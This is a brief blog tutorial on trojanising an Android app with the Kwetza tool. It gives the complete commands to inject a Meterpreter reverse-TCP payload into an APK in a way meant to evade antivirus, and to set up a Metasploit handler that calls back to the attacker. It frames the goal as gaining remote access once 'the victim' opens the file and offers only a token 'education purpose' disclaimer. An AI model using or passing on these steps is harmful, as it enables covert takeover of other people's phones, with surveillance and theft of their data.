Kwetza | Hack android using Metasploit | Parrot OS

0
1145

Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application’s default permissions or inject additional permissions to gain additional functionality.

Download Kwetza from Github

git clone https://github.com/sensepost/kwetza.git

To run Kwetza

cd kwetza 
python kwetza.py test.apk tcp 192.168.x.x 4444 yes

After that, Open a new terminal and open metasploit, by using following command

msfconsole
use exploit multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (i.e. your IP)
set LPORT (i.e. enter that port no. at the time of creating payload)
exploit -j

Wait for the victim will open/execute that file and you will get remote access of the victim device. For better understanding watch the step by step video tutorial given below.

Watch Step By Step Video On Youtube

“This tutorial is strictly for Education purpose, We are not responsible for any kind of damage.”

LEAVE A REPLY

Please enter your comment!
Please enter your name here